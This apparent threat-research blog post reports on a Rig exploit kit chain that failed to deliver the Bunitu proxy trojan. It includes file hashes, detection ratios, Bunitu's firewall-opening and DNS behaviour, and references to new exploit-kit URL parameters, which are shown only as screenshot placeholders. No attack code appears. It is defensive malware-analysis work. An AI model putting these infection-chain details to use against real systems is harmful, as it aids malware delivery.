    File name: 817e477fcf49c02945e2929d7e661bc25bd1e35a564ac65ae368efdeddc21725.bin
    Detection ratio: 12 / 61
  • Bunitu uses a DLL called zazxirr.dll.
    SHA256: 9c0d1b7105f3cbbbfee53e977a82d9ef70b0034392238a910daca68ee00c3158
    File name: zazxirr.dll.bin
    Detection ratio: 19 / 61
  • Bunitu opens random ports by changing firewall settings and allows the host to become a remote proxy.
  • Every time a client connects, Bunitu issues a DNS request. Although these did not trigger any ET signatures, I am sure they are initiated by Bunitu. [Screenshot: DNS requests]

Rig EK drops failed payload. (new params)

Summary:

I’ve been away for some time, busy moving house, but it seems the EK front has been very quiet the last few weeks. I’ve been unable to find Magnitude EK and many of my malvertising chains have turned up dry. Not even hurtmehard.net had something.

So I decided to revisit an IP hosting a gate I called the ‘small’ gate, on account of the iframe to Rig always containing the small tag. This gate always led to Bunitu proxy trojan. However, this time it failed.

I have seen several failures since I began hunting EKs. I saw a few with Sundown and many with Magnitude. I have always presumed it may be my lab, but this could indicate an update to Rig that the threat actors have yet to push. I did notice the new parameters that several other researchers have mentioned. This lull could indicate the calm before a storm or a decline in Rig EK.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

Downloads

(in password-protected zip)

Details of infection chain:

[Infection chain diagram: Rig EK with new parameters and a failed payload]

Full Details:

As noted by other researchers, Rig EK is using 3 new parameters.

[Screenshot: new Rig EK URL parameters]

This particular gate, which could be referred to as the “small” gate (since all redirections to Rig EK contained the “small” tag), used to drop Bunitu.

[Screenshot: the “small” gate iframe]

However, this time it appeared to fail. In addition, I did not see any wscript. The EK did run the following command, however.

[Screenshot: command run by the EK]

I have not dug into the landing page yet to look for any significant changes. I’m not sure why the payload failed, but it could be due to my host or a Rig EK update that the threat actor has yet to apply.